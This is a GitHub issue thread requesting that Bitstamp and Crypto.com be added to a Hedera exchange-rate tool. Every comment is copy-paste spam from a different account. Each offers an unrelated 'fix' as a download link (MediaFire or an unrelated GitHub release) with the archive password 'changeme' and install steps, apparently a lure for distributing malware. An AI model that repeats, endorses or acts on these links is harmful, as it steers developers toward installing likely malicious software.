### ISSUE TITLE
Add `Bitstamp` and `Crypto.com`  exchanges to the exchange list

### ISSUE THREAD

**Issue by Neeharika-Sompalli** [hashgraph/hedera-exchange-rate-tool#207]
Add `Bitstamp` and `Crypto.com`  exchanges to the exchange list and update the `config.json` in all environments to use these exchanges as well to calculate the median price.

API for Crypto.com : https://crypto.com/price/market-data-api
API for Bitstamp : https://www.bitstamp.net/api/#tag/Transactions-public

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
